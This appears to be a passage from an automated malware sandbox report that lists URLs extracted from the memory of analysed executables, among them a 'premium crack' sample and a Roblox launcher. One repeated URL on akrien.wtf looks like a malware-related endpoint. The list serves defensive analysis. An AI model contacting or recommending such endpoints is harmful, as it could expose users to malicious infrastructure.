            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4188930888.0000000000492000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh77058
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://bit.ly/1eMQ42U
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992633051.00000000042C8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.microsoftBU
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.dr, String found in binary or memory: http://ocsp.digicert.com0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992633051.00000000042C8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: refdhcp.exe, 00000009.00000002.1917392588.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://tools.medialab.sciences-po.fr/iwanthue/index.php
            Source: RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww(w.d
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://www.roblox.comURLInfoAboutFailed
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://www.winimage.com/zLibDll
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://www.winimage.com/zLibDll-1.2.11rbr
            Source: RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://127.0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://127.0.0.1
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://127.0.0.16)
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://127.0.0.1WindowsBootstrapperRecoveryInstallerUrlWindowsBootstrapperAlternativeAdminKeyDeploy
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://127.0.0.1tleThreshold
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://akrien.wtf/
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://akrien.wtf/&
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4188930888.0000000000492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh77058
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.00000000041F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com/
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com/7K
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.00000000041F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com/P
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/)
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/W
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerr
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflag
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflagw
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperJ
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperT
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://crashpad.chromium.org/
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://crashpad.chromium.org/bug/new
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://curl.se/docs/alt-svc.html
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://curl.se/docs/hsts.html
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbeMs2%l
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbeMs2?
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlFFlagRolloutDuplicateRobloxTelemetryCountersEnabled
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988611713.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994811368.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/(
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/3
